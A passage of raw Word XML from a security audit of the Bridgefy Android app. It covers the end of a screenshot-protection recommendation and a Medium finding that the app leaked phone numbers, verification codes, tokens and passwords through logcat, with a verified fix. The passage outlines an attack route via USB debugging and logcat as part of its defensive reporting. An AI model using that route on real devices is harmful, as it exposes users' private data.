          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>capturing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>relevant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>backgrounding events, typically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>onActivityPause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ON_PAUSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Lifecycle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>such purposes. After that, if possible, ensure that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>views</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>FLAG_SECURE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> set. This will guarantee that even apps running with root privileges are unable to directly capture information displayed by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>screen.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Alternatively,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>that all other activities inherit could be amended to always set this flag, regardless of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>focus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250042" w:id="13"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.0.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(318)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Android app leaks entire HTTP requests and responses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logcat messages on the device, some of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>phone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>number,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verification code, pushToken, prekeys, MQTT subscribed topics, contact list, etc. Additionally, the app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>username,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>password,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>etc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>statements.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker with access to an unlocked device could leverage this weakness to enable USB debugging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>retrieve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mentioned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>reveal not only the latest ADB messages but also previous ones that could contain sensitive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487600128">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>170743</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="39" name="Graphic 39"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="39" name="Graphic 39"/>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3.444336pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15716352;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape29" coordorigin="1440,269" coordsize="2880,0" path="m1440,269l4320,269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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId76">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.android.com/.../Application.ActivityLifecycleCallbacks#onActivityPaused...</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId77">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.android.com/reference/androidx/lifecycle/Lifecycle.Event</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId78">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>http://developer.android.com/reference/android/view/Display.html#FLAG_SECURE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId79">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.android.com/studio/command-line/logcat</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This issue was identified while looking for logcat leaks, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OkHttp </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>package is currently configured in a way that leaks at least certain HTTP requests like the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Logcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
